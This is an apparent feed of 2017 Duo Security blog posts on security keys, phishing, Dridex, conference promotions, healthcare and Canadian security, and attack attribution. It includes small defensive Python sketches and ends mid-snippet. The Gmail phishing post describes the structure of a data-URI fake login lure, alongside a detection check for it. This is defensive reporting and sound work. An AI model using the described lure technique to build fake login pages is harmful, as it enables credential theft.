Without physical access to the device and security key, a threat actor can’t gain unauthorized access to your accounts. This method also thwarts phishing and other data-stealing attacks that count on usernames and passwords alone to give them easy, unfettered access to your accounts.

Security keys are also more secure than SMS-based two-factor authentication (2FA), in which a user verifies their identity by typing in a verification code sent via text message to their phone. An attacker who intercepts those SMS messages can log in as the user.

Back in July of last year, the U.S. National Institute of Standards and Technology (NIST) announced it would be deprecating SMS-based 2FA in its guidelines for digital authentication, deeming it no longer secure enough to recommend for remote access.

In addition to being more susceptible to phishing attempts, SMS 2FA also relies on the security of the telephony and carrier infrastructure, which is typically not very secure. Plus, many apps on the average phone have access to the SMS inbox, which could lead to easily stolen one-time passcodes - find out more in Duo Aligns With NIST on New Authentication Guidelines.

Security keys send cryptographic proof that users are, in fact, on a legitimate Google site and in physical possession of their security keys, stopping attackers that remotely attempt to access accounts, according to the Google Account Security team.

Even More Security Precautions Announced By Google

In addition to adding security key support for authentication, Google announced the availability of a hosted S/MIME service that ensures Gmail messages are encrypted, beyond TLS capabilities, to secure every hop an email makes throughout the delivery life cycle before it reaches your inbox.

This adds account-level signature authentication, as opposed to domain-based authentication. It allows email receivers to verify that an email actually came from the sending account and not just a matching domain, according to Google, as reported by Threatpost.
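The distinction can be sketched as follows - a hypothetical illustration, not Google's actual verification logic:

```python
# Hypothetical sketch: a domain-level check (DKIM-style) only confirms the
# domain, while an account-level check (S/MIME-style) confirms the exact
# sending address, so a same-domain spoof is caught.

def domain_level_check(from_addr, authenticated_domain):
    return from_addr.split("@")[1] == authenticated_domain

def account_level_check(from_addr, signer_addr):
    return from_addr == signer_addr

claimed = "ceo@example.com"      # address shown in the From: header
signer = "intern@example.com"    # account that actually signed the message

print(domain_level_check(claimed, "example.com"))  # True: same domain passes
print(account_level_check(claimed, signer))        # False: spoof is caught
```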

Here’s hoping it cuts down on phishing email campaigns that leverage similar and matching domain names to lure users and their inboxes into a false sense of security.

Universal 2nd Factor by FIDO Alliance

The Fast IDentity Online (FIDO) Alliance created a strong industry standard for two-factor authentication known as Universal 2nd Factor (U2F).

Google, Facebook, Duo and many others announced support in 2014 for the hardware-based authentication standard, which simplifies the login process while providing stronger security for users. The method only requires a web browser, operating system and U2F device.

Once enrolled with Duo, users can tap the USB device plugged into their laptop to verify their identities and quickly log in. The USB device protects private keys with a tamper-proof component known as a secure element (SE). Learn more about U2F.
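The origin-binding that makes U2F phishing-resistant can be sketched as a challenge/response flow. This is an illustrative stand-in: real U2F tokens sign with a per-site ECDSA key pair held in the secure element, and the server verifies with the public key; here a shared HMAC key substitutes for that signature so the sketch stays self-contained:

```python
# Illustrative U2F-style challenge/response. A real token signs with a
# per-site ECDSA key in its secure element and the server verifies with
# the public key; HMAC-SHA256 stands in for that signature here so the
# sketch stays dependency-free.
import hmac, hashlib, os

device_key = os.urandom(32)  # never leaves the token in a real device

def device_sign(app_id, challenge):
    # The token signs the origin as well as the challenge, so a response
    # produced for one site cannot be replayed by a phishing site.
    return hmac.new(device_key, app_id + b"|" + challenge, hashlib.sha256).digest()

def server_verify(app_id, challenge, response):
    expected = hmac.new(device_key, app_id + b"|" + challenge, hashlib.sha256).digest()
    return hmac.compare_digest(expected, response)

challenge = os.urandom(16)
response = device_sign(b"https://accounts.google.com", challenge)

print(server_verify(b"https://accounts.google.com", challenge, response))  # True
print(server_verify(b"https://phish.example", challenge, response))        # False
```

Because the origin is part of what gets signed, a lookalike site receives a response it cannot use against the real one.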

]]>
<![CDATA[Discover Duo's Healthcare Security Solutions at 2017 HIMSS]]> https://duo.com/blog/discover-duos-healthcare-security-solutions-at-2017-himss https://duo.com/blog/discover-duos-healthcare-security-solutions-at-2017-himss Thu, 02 Feb 2017 09:00:00 -0500

Duo Security is packing our bags for the leading health IT conference, the Healthcare Information and Management Systems Society (HIMSS) 2017, running Feb. 19-23 in Orlando at the Orange County Convention Center.

More than 40,000 health IT professionals, clinicians, executives and vendors from around the world will be on hand at this conference that brings together more than 300 programs spanning keynotes, thought leader sessions, roundtable discussions and workshops.

If you plan to attend, visit us at booth #277, where we’re showing off Duo’s two-factor authentication and endpoint security solutions with an eye toward the healthcare industry, serving organizations like hospitals, healthcare systems and university health systems.

You can find us on the expo floor during these hours:

  • Monday, February 20, 10 a.m. - 6 p.m.
  • Tuesday, February 21, 9:30 a.m. - 6 p.m.
  • Wednesday, February 22, 9:30 a.m. - 4 p.m.

Say hello, get answers to some of your security questions and enjoy some free swag!

Protecting Patient Data with Duo

We provide information security solutions that integrate with electronic healthcare record systems (EHRs) to protect patient data from unauthorized access. Duo offers secure two-factor authentication that’s quick and easy for busy healthcare professionals to use. Choose from a variety of authentication methods:

  • Single Sign-On - Securely access all enterprise cloud applications by logging into a web portal once.
  • Duo Push - Send a push notification to your device, and log in by tapping ‘Approve.’
  • Phone Callback - Call a phone, then log in by answering and pressing a key.
  • SMS Passcode - Get an SMS message with a code, type it in and log in.

HIPAA Security Rule guidelines on accessing electronic protected health information (ePHI) recommend using two-factor authentication to mitigate the risk of lost or stolen credentials that could result in unauthorized access to ePHI.

Two-factor authentication is also required by the Drug Enforcement Administration’s mandates for securing e-prescriptions. Practitioners must use two forms of identification for identity-proofing, to sign and verify digital prescriptions.

Duo also offers comprehensive endpoint visibility, tracking outdated or vulnerable devices that attempt to authenticate into your environment, and offering your users and admins the ability to update those devices.

With customizable policy and controls, you can block at-risk devices from connecting to your network, reducing the risk of transferring malware or allowing external attackers to exploit vulnerabilities to breach your company. Learn more about Duo's solutions for Healthcare.

Altegra Health Case Study

With Duo Security, Altegra Health was able to deploy two-factor authentication to cover Virtual Desktop Infrastructure (VDI) desktops. Duo offered Altegra Health a much easier deployment process, inexpensive overhead costs and minimal strain to their small support team.

Duo alleviated Altegra's concerns about network connectivity issues by offering a variety of different authentication methods, including SMS-based passcodes and phone callbacks for authenticating while offline.

Our admins love Duo's easy and intuitive administrative panel. Our users like that it doesn’t disrupt their workflow more than necessary. — Mark Kueffner, Senior Director of IT Systems Architecture & Operations

Read the full Altegra Health case study, and browse our other case studies.

Guide to Securing Patient Data

Duo developed this guide to examine some of the ways that patient data can be vulnerable and how you can protect it. To learn more about patient data security, download Duo Security's Guide to Securing Patient Data: Breach Prevention Doesn’t Have to Be Brain Surgery.

To help you navigate patient data security, our guide will:

  • Summarize relevant health IT security legislation, including federal and state
  • Provide information security guidelines on remote access risks and solutions
  • Provide extensive security resources and a real hospital case study
  • Explain how to protect against modern attacks and meet regulatory compliance with two-factor authentication

This guide is ideal for CISOs; security, compliance and risk management officers; IT administrators; and other professionals concerned with information security. It’s written for IT decision-makers who need to implement strong authentication security, as well as those evaluating two-factor authentication solutions for organizations in the healthcare industry.

Download the free guide today.

]]>
<![CDATA[Banking Malware Dridex Targets U.K. Financial Institutions]]> https://duo.com/blog/banking-malware-dridex-targets-uk-financial-institutions https://duo.com/blog/banking-malware-dridex-targets-uk-financial-institutions Tue, 31 Jan 2017 09:00:00 -0500

A number of U.K.-based financial institutions were hit by a wave of banking malware, delivered via phishing email campaigns, Threatpost reported.

Last year, Dridex was reported as one of the most dangerous variants of financial malware in circulation. According to Flashpoint, the malware is back this year with new techniques to bypass security and steal user data.

Phishing for Financial Credentials

The Trojan is designed to steal banking credentials, targeting customers of financial institutions via spam campaigns using real company names in the sender address and email copy. Many of these emails are disguised as invoices, receipts and orders, according to Symantec.

In the newest attacks, detected in December and late January, small phishing and spear-phishing email campaigns targeted U.K. financial institutions. The email messages contained attachments with embedded macros that infect users with Dridex.

Although macros are disabled by default by Microsoft, the malware has still proved successful in the U.K., as instructions in the documents socially engineer users into enabling macros, while other email campaigns contained obfuscated macros, according to Threatpost.

The attacks have also been using a new technique that can bypass Windows User Account Control (UAC) on both fully patched and older Windows versions, as detailed in a technical analysis by Flashpoint. In this attack, Dridex is able to alter Windows System32 directories to give itself the highest possible privileges, whitelisting itself as a trusted application so it can run silently on targeted PCs.

Financial Information Security Tips

How can you and your users protect your financial organization against malware infection? Here are a few preventive measures:

  • Keep your security software and all device software - including operating systems, plugins, browsers, etc. - up to date. Out-of-date software runs a higher risk of getting compromised by known/reported vulnerabilities. Learn more about Trusted Devices.
  • Don’t click on any suspicious-looking emails - send them to your security or IT team.
  • Never enable macros on any Microsoft Office document attachment that asks you to do so.
  • Use two-factor authentication to protect access to your online banking applications and all other logins. In the event that your credentials are compromised via phishing or malware, an online criminal can’t successfully log into your accounts without possessing your physical device to complete two factor and verify your identity.

Learn more about how financial organizations can comply with data security regulations in their industry and protect access to their financial information by visiting Securing Access to Financial Data.

]]>
<![CDATA[Hello, San Francisco! Survival Tips for Attending RSAC 2017]]> https://duo.com/blog/hello-san-francisco-survival-tips-for-attending-rsac-2017 https://duo.com/blog/hello-san-francisco-survival-tips-for-attending-rsac-2017 Mon, 30 Jan 2017 09:00:00 -0500

Heading to RSAC 2017 in San Francisco this year? Whether you’re a first-time attendee or a seasoned pro, it can be a challenge to get through without at least some stress. But don’t sweat it; I’ve got some general tips to guide you.

Plan, and Then Plan Some More

First things first: Let’s talk about your tech. Leave as much of it as possible at home. These days, you can get by with a phone and the proper apps. If you like to take notes and insist on some type of larger device, maybe bring a tablet or Chromebook, but the idea is to free yourself up tech-wise as much as you can stand. Before the conference, load up all of the apps you’ll need, including the official conference app, which has the complete schedule and maps of everything within the physical conference space. Patch everything and do your backups. Bring your chargers, and buy one or two of those portable batteries for your phone/tablet to carry with you – your devices will drain faster than you might think. And don’t forget the earbuds!

If you must bring a laptop, make sure you have a personal firewall up and running with all ports off, disable Wi-Fi and Bluetooth unless you really, really must use them, and turn the laptop off when you’re done.

For more on traveling with your tech, check out my recent blog post discussing holiday travel – a lot of advice there applies.

Your clothing choices are also key. Dress comfortably in breathable clothes, and wear comfortable shoes; you’ll be doing a lot of standing, walking and sitting in crowded rooms. Bring an empty water bottle you can refill to keep hydrated, and I usually pack a supply of granola bars so I have a couple with me during the day. I’d also recommend a comfortable backpack, purse or satchel made of knife-resistant material (to thwart those knife-wielding pickpockets) for everything you’re carrying around.

I hope you don’t have to bring any traditional business attire – lots of folks go to RSAC but barely attend the conference itself because they’re in meetings with potential clients, vendors and partners. If that sounds like you, I’d do everything possible to avoid stiff suits or skirts at the conference proper, because 1) they'll be wildly uncomfortable by the end of the day, and 2) everyone will think you work there and keep asking you for directions to the restrooms – I’ve seen it happen!

Preview the schedule on the conference app on your phone, and if you’re a full session attendee you’ll probably hit up a number of the session talks. It’s a good idea to have each talk you want to attend lined up, plus a backup in case your first pick is full. If two talks you want to see are at the same time and you need to break the tie, try to attend the one where you might be more likely to ask questions. Keep in mind, most of the talks are recorded and you can view them later, so no big deal if you miss one.

You Are Here

After you’ve checked in at the hotel, try to check in for the conference as soon as you can. If you arrive early enough in the day on Saturday or Sunday, you may be able to check in (you can find check-in times on the RSAC website or app). Monday and Tuesday have long conference check-in lines, so get there early if you can’t do it on the weekend. When you check in and get your lanyard, you’re often handed what I refer to as “the bag of crap,” loaded with stuff like swag from sponsors and various fliers. I usually go through it, see what I can live without and then hand them back the bag. The main thing is just getting the lanyard, no point in having extra junk to lug around.

Turn off unneeded services on your tech! Disable Bluetooth, and I would avoid using the conference Wi-Fi, so leave that off as well. I would also avoid any free Wi-Fi anywhere at or near the conference, like hotels and coffee shops. This is a security conference, and while it’s not quite as volatile as DEF CON’s network, there’s still a risk. But you’re a security professional, so no problem – turn off your phone’s Wi-Fi, use the data plan on your phone, and if you must use another device like a laptop, tether it to your phone for interwebbing. Use a VPN, use strong passwords, and use 2FA!

Other Conference Fun Stuff

The keynotes on Tuesday morning and Friday afternoon are usually the most crowded events, so decide if you want to stand in a long line to see it in person, watch it from one of the two viewing areas (at least they had two in 2016), or follow the live stream on your phone (one of many reasons to have your earbuds at the ready). And feel free to just skip them – the Friday one is usually a celebrity that has nothing to do with our industry, so unless you really want to see Seth Meyers make jokes about nerds and generally not get our industry, you can probably have a more productive time doing “hallway con” with some colleagues.

A word about the expo floor – this is a sea of millions of vendors (well, a few hundred, but damn) usually housed in not one but two areas. You’ll see everything from excellent companies with fun, creative booths to sad, small companies spending the last of their VC money in a desperate attempt to make it to the next round of funding. Some attendees make a game out of trying to collect as many vendor t-shirts, whistles, letter openers, keychains, pens and other branded pieces of swag as they can, so if that’s your thing you’ll find this to be a treasure-laden environment. Unless the swag is really great (like a book you wanted to read, or a black hoodie like the kind hackers wear in Shutterstock photos), I usually avoid it… although I do admit I’m a sucker for tech-themed stickers.

Some Conference No-No’s

Don’t collect USB sticks, especially if they’re lying around in the restroom (eww!) or on a table in a common area near food. Don’t sit down and tell someone you just met every last detail about your insecure network. And while talking to a vendor in a booth about a solution is great (always ask tough questions!), I’d avoid spilling your technical guts to them unless you’re in a private area where you won’t be overheard.

Don’t hack at the conference. Trust me, this will be a target-rich environment for sure. But while this type of illegal behavior is nearly a tradition at hacker conferences, it’s frowned upon with great legal vengeance at more conservative events like RSAC.

A general rule of thumb – if the person introducing the keynote is dressed for a funeral, don’t hack there. If they are wearing a black t-shirt, you probably still shouldn’t do it, but if you do and get caught they probably won’t press charges.

Final Words

Have fun! It can be a long week. Remember to try and get plenty of restful sleep at night so that you’re recharged for the next day. Don’t attend too many vendor-sponsored parties, and don’t drink or 420 yourself silly. Do that “networking with people” thing I keep hearing about, be flexible to changes (especially if you have no control over them), and most importantly stay vigilant and safe!

]]>
<![CDATA[Join Duo Security at the 2017 RSA Conference]]> https://duo.com/blog/join-duo-security-at-the-2017-rsa-conference https://duo.com/blog/join-duo-security-at-the-2017-rsa-conference Tue, 24 Jan 2017 10:00:00 -0500

Once again, Duo Security is doing it big on the West Coast this year at the 2017 RSA Conference hosted at the Moscone Center in San Francisco, California from February 13-17.

The RSA Conference is the world’s largest information security conference, drawing in over 45,000 attendees each year to share insights on current IT security issues, attracting the world’s best and brightest in the field.

Visit Duo at Booth #1247

For fun t-shirts, quick demos and friendly conversations, stop by Duo’s booth #1247, located in the South Hall, Hall B.

Duo RSA Booth Map

We’ll be there from:

  • 10 a.m. - 6 p.m. PST Tuesday and Wednesday
  • 10 a.m. - 3 p.m. PST Thursday
  • 5 - 7 p.m. PST Monday for the Welcome Reception

Duo at RSA

We’d love to chat in person, as well as answer any questions you might have. To set up a meeting with a Duo rep during the RSA conference week, please submit a request.

Need a pass to the RSA exhibit hall? Take advantage of our special offer for a complimentary exhibit hall-only pass with our expo code: XE7DUOSEC

Deadline to redeem the expo pass code is February 15, 2017. Register on the RSAC site.

Party With Duo!

There ain’t no party like a Duo party! Trust us. Join us at the underground lounge, Local Edition, on Tuesday, February 14 from 7:00-11:00 p.m. PST, where we'll be slinging drinks, spinning some banging music and handing out Duo swag. We’ll also be handing out Duo’s Women in Security awards at 8:00 p.m.!

Duo at RSA Party

The venue is a 1950s-style cocktail lounge in a former newspaper printing room located in the Hearst Building. And we wouldn’t have it any other way. RSVP today.

RSAC 2017: The Talks

Some of the top keynote speakers this year include:

  • Neil deGrasse Tyson, astrophysicist and author, researcher of star formation, exploding stars, dwarf galaxies and the structure of our Milky Way - need I say more?
  • Dame Stella Rimington, the real-life inspiration for “M,” played by Judi Dench in the James Bond 007 films
  • Seth Meyers, Emmy Award-winning writer and current Late Night host, will give the closing keynote

The RSA Conference will also feature sessions each day covering:

  • Data Security & Privacy
  • Hackers & Threats
  • The Human Element
  • Governance, Risk & Compliance
  • Application Security
  • CISO Viewpoints
  • Industry Experts

View the full RSAC agenda here.

Attend Duo's Talks at RSAC 2017

Don’t miss Duo’s own Principal Security Strategist, Wendy Nather, who will be presenting What CISOs Wish They Could Say Out Loud on Tuesday, February 14 at 1:15 p.m. Reserve your seat today to avoid the line!

Abstract:

It’s hard to get CISOs to speak in public about their security programs. They can’t admit what they did wrong or reveal what they did right. It’s time for true confessions. This presentation will speak for the voiceless in response to annoying questions like, “Why can’t I have a long password?” “Why does it take a year to fix this security flaw?” and “Can you really fly a plane sideways?”

Wendy will also be leading an interactive small group discussion, Multifactor Authentication Redefined on February 16 at 7:00 a.m. at Moscone West, 2011 Table C.

Abstract:

With NIST threatening to deprecate SMS as an authentication factor and enterprise use cases mingling with consumers, how do organizations plan to cover all their MFA needs? This discussion will range from advanced risk-based MFA to first-time deployments in sectors that haven’t been able to use it before. Attendance is strictly limited to allow for a small group experience.

Hope to see you there!

]]>
<![CDATA[Well, How Did I Get Here? Why I Joined Duo]]> https://duo.com/blog/well-how-did-i-get-here-why-i-joined-duo https://duo.com/blog/well-how-did-i-get-here-why-i-joined-duo Mon, 23 Jan 2017 10:00:00 -0500

CEOs: I’ve seen a few. During my five years as an industry analyst for 451 Research, I sat across the table from more security CEOs than I can count. I listened to their visions; I looked at their slides; I checked numbers; I noted what they didn’t say as well as what they did say. As soon as I met the team of Dug Song and Jon Oberheide, I was impressed by their way of simply talking to me as a human being, rather than as a necessary evil standing in between them and the next conference cocktail party.

When I started using Slack to join personal teams, I discovered that it supported two-factor authentication using Duo, so I tried it out, and I immediately liked it. I’d been using hard tokens for 20 years (and I’m still finding dead ones in the garage), but there was something so satisfying about just touching a green checkmark on my phone.

I’ve seen many user interfaces that were -- shall we say -- “engineering grade,” but this was something that felt good to use. How special is that in security?

Sometimes it’s the simplest things in life that are best. Not driving your enemies before you, and hearing the lamentations of their salespeople, but just clicking on a nice button, having it work, and being treated well. In this day and age, and in this industry, those are rarities.

Yes, I joined Duo because I believe in the greater vision of the company and its founders.

It’s gone well beyond multi-factor authentication and is focusing on bringing more of the security basics -- visibility, integrity testing, enforcement and protection -- into an easy-to-use package that fits into the new cloud and mobile environment, even for companies below the security poverty line.

I believe that if we’re going to improve security around the world, we have to put it within reach of everyone, not just those who can afford to buy one of everything. We have to empathize with customers and understand the constraints they’re working under.

It’s not just what we do; it’s how we do it, and choosing every day to make both life and technology simpler, easier, and more satisfying.

So I knew I had made the right decision when I announced it and got dozens of responses saying, “You’re going to Duo? I love them!” I have the opportunity to change from being a Necessary Evil to making a difference as part of a company that builds connections with its (over 7,000) customers while securing them. That, to me, is the best possible way to kick off 2017.

]]>
<![CDATA[The Latest Phishing Attacks Target Gmail, Microsoft Word & Android Apps]]> https://duo.com/blog/the-latest-phishing-attacks-target-gmail-microsoft-word-and-android-apps https://duo.com/blog/the-latest-phishing-attacks-target-gmail-microsoft-word-and-android-apps Fri, 20 Jan 2017 09:00:00 -0500

Recently, phishing attacks against Gmail users, a major U.S. financial services provider, and Android app users have revealed unique ways to deliver malware and steal login credentials.

Gmail Phishing

The latest highly-effective attacks include specially crafted URLs to trick users into typing in their Gmail credentials on a spoofed site.

The phishing emails contain what appears to be an attached PDF document, but is actually an embedded image - once a user clicks on it, they’re directed to a very convincing yet fake Gmail login page, according to SecurityWeek.com. An example can be seen below, as posted by user @tomscott to Twitter and reported by Fortune.com:

Gmail Phishing PDF Image

The URL of the fake Gmail login page reads “data:text/html,https://accounts.google.com” plus a longer string of text that is hidden by extra whitespace. According to the researchers at Wordfence, this phishing technique uses a data URI to embed a complete file in the browser location bar. When you click on the embedded image, a script serves up a file designed to look like a Gmail login page, but really works to steal your login credentials.
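A first-pass defensive check for this trick is simply to flag "URLs" whose scheme is data: rather than https: - a minimal sketch, not a complete phishing detector:

```python
# Minimal sketch: flag location-bar text that uses the data: scheme, the
# trick described above ("data:text/html," followed by a lookalike URL).
from urllib.parse import urlsplit

def looks_like_data_uri_phish(location_bar_text):
    scheme = urlsplit(location_bar_text.strip().lower()).scheme
    return scheme == "data"

print(looks_like_data_uri_phish(
    "data:text/html,https://accounts.google.com/ServiceLogin"))  # True
print(looks_like_data_uri_phish("https://accounts.google.com"))  # False
```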

There have been reports of users getting compromised almost immediately after entering their credentials. Attackers are logging into the compromised accounts and accessing contact lists in order to find new victims, sending them emails from the compromised user’s address.

Google has released a statement about the attacks:

"We’re aware of this issue and continue to strengthen our defenses against it. We help protect users from phishing attacks in a variety of ways, including: machine learning based detection of phishing messages, Safe Browsing warnings that notify users of dangerous links in emails and browsers, preventing suspicious account sign-ins, and more. Users can also activate two-step verification for additional account protection."

Microsoft Word Phishing

Another set of phishing emails were sent to a major U.S. financial services and insurance provider. These emails contained a Microsoft Word attachment designed to deliver a malicious payload that installed a keylogger on the user’s machine.

Keyloggers collect information that the user types, including passwords and personal information, sending it to the attacker’s email.

What’s different about this particular phishing email is it uses an embedded object in the form of a Visual Basic Script (VBS) that can be opened and executed from within the Word file, according to ZDNet.com.

The Word file prompted users to click on an image in order to install Microsoft Silverlight to view the document content. Other malicious Word attachments usually ask the user to enable macros to view content, which allows them to evade detection as they download malware on their machine.

Android App Phishing

Meanwhile, a number of infected Android apps in the Google Play Store were reportedly stealing Instagram users’ passwords, according to Softpedia.com. These free apps were advertised as ways to increase follower counts, get Instagram analytics or automate posting, and they prompted users to type in their Instagram login credentials after installation.

The apps have been removed from the Google Play Store, and they are flagged as malicious by antivirus solutions for Android devices. However, if you have downloaded or shared your credentials, it’s a good idea to change your password now.

Security Tips to Protect Against Phishing

Phishing emails may be relentless, but they don’t have to be successful. Keep your defenses up by doing the following:

Enable two-factor authentication on every login. Also known as multi-factor authentication, two-factor authentication can effectively protect access to your Gmail and other applications with a smartphone app that sends a notification to your phone to verify your identity. That way, even if online criminals manage to steal your username and password, they still can’t log into your accounts without physical possession of your mobile device.

Assess your risks by conducting a phishing simulation. To evaluate your company’s likelihood of getting phished successfully, use a free phishing simulator tool to send targeted emails to your own employees. Use the data to educate your users and to make security budget decisions.

Check the address bar. Don’t enter your credentials into any site with a questionable URL. In the case of the Gmail phishing attack, the “data:text/html” might have seemed innocuous enough, but most secure sites start with “https://” and display a lock icon.

In general, don’t enter your password into a page you clicked on via email, and be wary of password prompts when you’re already logged into and viewing Gmail content.

Identify and update software on your devices. Exploit kits and malware downloaders leverage out-of-date software on user devices in order to compromise them. The 2016 Duo Trusted Access Report: Microsoft Edition found that nearly 62 percent of devices running Internet Explorer have an old version of Flash installed, leaving them exposed to known vulnerabilities that target Flash.

Use a comprehensive endpoint security solution to detect outdated software on your devices and block risky devices from accessing critical applications, reducing your risks.

Learn more by downloading The Trouble With Phishing to get:

  • The latest phishing statistics by industry
  • A breakdown of how phishing works
  • The anatomy of a phishing attack

This guide details the problems around phishing, how it works, and how Duo can be leveraged as a solution.

]]>
<![CDATA[The Current State of Cyber Security in Canada]]> https://duo.com/blog/the-current-state-of-cyber-security-in-canada https://duo.com/blog/the-current-state-of-cyber-security-in-canada Thu, 19 Jan 2017 00:00:00 -0500

The most current Canadian Cyber Security Strategy may date back to 2010, but the Government of Canada has recently been working toward renewing its approach to cyber security, holding a public consultation to review measures to protect critical infrastructure and Canadians from cyber threats.

Most recently, the Canadian Institute for Cybersecurity opened in New Brunswick as part of an economic development strategy called CyberNB, according to ITWorldCanada.com.

“[Cyber security] is the fastest growing area of IT and it will be for the next 20 years,” said Stephen Lund, CEO of Crown Corporation Opportunities NB.

Increasing Threats to Canada’s Cybersecurity

But what are Canadian organizations actually doing to protect themselves against new threats, and is it enough? About one in three targeted attacks in the past year resulted in a security breach for Canadian companies, according to an Accenture survey.

Last year, many Canadian universities and hospitals were victims of ransomware attacks that caused computers to go offline, disrupting service. In one event, ransomware infiltrated the hospital network via a phishing spam email with a malicious attachment, according to BeckersHospitalReview.com.

Investing in Cloud-Based Security

A report by PricewaterhouseCoopers (PwC) reveals that 64% of organizations in Canada are investing in cloud-based cybersecurity services.

Access Security

Canadian Insights: The Global State of Information Security Survey reveals that 62% of Canadian organizations are adopting advanced authentication to protect access to their systems, up 7% from the year prior. Another 46% are investing in identity and access management.

One aspect of advanced authentication is the use of an additional factor to verify a user’s identity at login. The first factor may be a username and password, and a second factor (known as two-factor or multi-factor authentication) may be a push notification sent to the user’s phone via a mobile authentication app.

The PwC survey reports that 57% are investing in multi-factor authentication, up 4% from the year prior, with 61% using software tokens, and 48% investing in smartphone tokens.

Endpoint Protection

The PwC survey also found that Canadian organizations are investing in endpoint protection (50%), real-time monitoring and analytics (56%) and threat intelligence (46%).

In a report by Malwarebytes on ransomware, the security company found that Canadian organizations were the most likely to find that ransomware had entered their organization via smartphone or tablet.

One way to protect against malware is to check the security health of every device to ensure only Trusted Devices can access your applications and data. By vetting your endpoints, you can also apply device access policies to block any risky devices, including mobile phones that don’t meet your security standards.

Cost of a Data Breach in Canada

In 2016, the average cost of a data breach in Canada rose to $211 per breached record, a 12% increase from the year prior, according to the 2016 Cost of a Data Breach Study: Global Analysis (PDF) by the Ponemon Institute.

The report found that detection and escalation costs were the highest in Canada - these include forensic and investigative activities, assessment and audit services, crisis team management and communications to the executive management team and board of directors.

Companies in the U.S. and Canada spent the most attempting to resolve a malicious or criminal attack, at $236 and $230 per record, respectively. With 48% of all breaches in 2016 caused by malicious or criminal attacks, that’s not cheap.

Learn more about protecting against remote access risks in Duo’s Securing Remote Access Guide and the 2016 Duo Trusted Access Report.

]]>
<![CDATA[UK Hospital Systems Running Windows XP Are Taken Offline]]> https://duo.com/blog/uk-hospital-systems-running-windows-xp-are-taken-offline https://duo.com/blog/uk-hospital-systems-running-windows-xp-are-taken-offline Wed, 18 Jan 2017 00:00:00 -0500

The largest hospital group in the UK was the victim of an online attack, forcing it to take some of its systems offline.

The Barts Health NHS Trust is a system of three district general hospitals staffing over 15,000 employees serving 2.5 million patients in east London.

The Health Service Journal reports that the attack affected thousands of files on the hospital group’s systems running Windows XP, and the file sharing system between departments has been turned off, according to the Telegraph.

Last year, ransomware attacks against Northern Lincolnshire and Goole Hospitals forced them to shut down systems and cancel operations for four days.

They were infected with a variant known as Globe2, which commonly infects users via phishing emails containing malicious links, according to ZDNet.

Protecting Healthcare Against Security Breaches

How can you protect your organization against ransomware and other online attacks against patient data?

Update your operating systems. The hospital group was running Windows XP, released in 2001 - over 15 years ago - and it has over 700 reported vulnerabilities logged in the CVE Details database.

Extended support for the OS ended in April 2014, meaning it no longer receives security updates. That makes it an easy target for attackers that exploit known software vulnerabilities in older systems to get access to hospital files.

According to Duo’s 2016 Trusted Access Report, the healthcare industry has twice as many Windows endpoints running XP as Duo’s average customer. Another 78% of the Windows endpoints in healthcare are running the outdated Windows 7 OS, released in 2009.

Get visibility into your endpoints. Check the security health of every device that logs into your systems to ensure only Trusted Devices can access your applications and patient data.

Create custom device access policies to block risky devices based on what security features they’ve enabled, or what version of software they’re running to reduce the risk of ransomware infection.

Step up your authentication game. Add not only two-factor authentication (also known as multi-factor authentication) to your system logins, but invest in a solution with advanced user access policies to ensure only Trusted Users are granted access.

Run a phishing simulation. Since phishing emails are often the harbinger of ransomware, malware and other credential-stealing attacks, measure your organization’s level of risk and likelihood of getting phished by launching a simulated internal phishing campaign. Then use the data to identify risks and educate your employees. Learn more about Duo Insight, a free phishing simulator tool, and read our guide, The Trouble With Phishing to learn about risks.

Check out Duo’s Guide to Securing Patient Data for more on relevant health IT security legislation, information security guidelines for remote access risks, and more on how you can protect against modern attacks and meet regulatory compliance with two-factor authentication.

]]>
<![CDATA[The Weird World of Attribution]]> https://duo.com/blog/the-weird-world-of-attribution https://duo.com/blog/the-weird-world-of-attribution Tue, 17 Jan 2017 00:00:00 -0500

It seems like everywhere you go online, you run into stories about hacking and how some nation state is behind it. A year ago, it was China. Now Russia's getting all of the headlines. And while we’d love to tell you it’s a load of bullshit, there’s a grain of truth behind it, which I’d like to take a stab at pointing out. (Full disclosure: I used to do attribution and research surrounding attribution at a previous employer.)

First off, you might wonder, why attribute? If we cover what’s tracked during the attribution process, things start to come into focus.

An Endless Supply of Indicators...

You can collect a lot of items while analyzing attacker data. There are the obvious ones — IP addresses, domains used, and so on — but that’s just the tip of the iceberg. Each of these is a clue, though often a vague one, but together they fit into a larger puzzle.

Let’s take a simple attack scenario: a targeted phishing email. A partial list of indicators includes things like the subject line, sender, recipient, some or all of the email body including the general topic (i.e., fake FedEx tracking notification), whether or not there’s an attachment, and the sender’s domain.

Pretty much everything in the headers alone can be used as an indicator: the date (including time and day), whether a compromised domain or a free email service like Hotmail was used, data within the Message-ID field, data within the User-Agent field, and on and on.

What was the attachment, an Office doc or PDF? Is there an older or recent vulnerability involving the attachment, or maybe a zero-day? Actually, zero-days are rather rare, because in most cases older vulns will work (unfortunately).

If there’s a URL in the email, is it a compromised domain or a domain created last week? Who registered it? What email service did they use? Is there a browser vulnerability at the pointy end of that URL? Which browser is impacted? Multi-stage payload?

Speaking of those payloads, entire security conference presentations have been devoted to determining the compiler used to build an executable. This analysis can include not only the version of a particular compiler, but also the language: English, Chinese or whatever. Timestamps often include timezone markers, so if an executable was compiled during the daylight hours of the +0300 GMT time zone (Moscow’s time zone), a story starts to unfold.

...But They Could Lie

An astute technologist will point out that an adversary could falsify many of these indicators, making it look like a different group of attackers caused an incident, but there are some caveats. To impersonate another attacker, an adversary would need to know all of the indicators surrounding that attacker, and most of this data is non-public. Yes, dozens of indicators are released in various threat intelligence feeds and in some of the more high-profile reports that security teams release to the public, but defenders track hundreds of indicators, not dozens.

Statistically, when grouping fresh indicators to classify an incident, you won’t have a 100% match on all past indicators. Domains expire or outgrow their usefulness, popped systems used for command and control get wiped and reloaded, and data changes over time. But usually you’ll get a match of roughly 70-80%, which is a good indication that you’re dealing with a specific repeat customer.

Another nation state actor? The match of indicators dips to the 20-30% range, and a random attack, for example by a worm or script kiddie, will match 5-10% of indicators. (These numbers are meant more for illustration and may not be exact for your organization, but you get the idea.)
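The match percentages above boil down to simple set overlap. A toy sketch follows; the indicator names, values, and scoring rule are invented purely for illustration:

```python
# Toy sketch: score a fresh incident against a known actor's historical
# indicators. All indicator names/values here are invented for illustration.
def match_percentage(known_indicators, fresh_indicators):
    """Percent of the fresh incident's indicators seen for this actor before."""
    if not fresh_indicators:
        return 0.0
    overlap = known_indicators & fresh_indicators
    return 100.0 * len(overlap) / len(fresh_indicators)

# Historical profile of a hypothetical repeat customer
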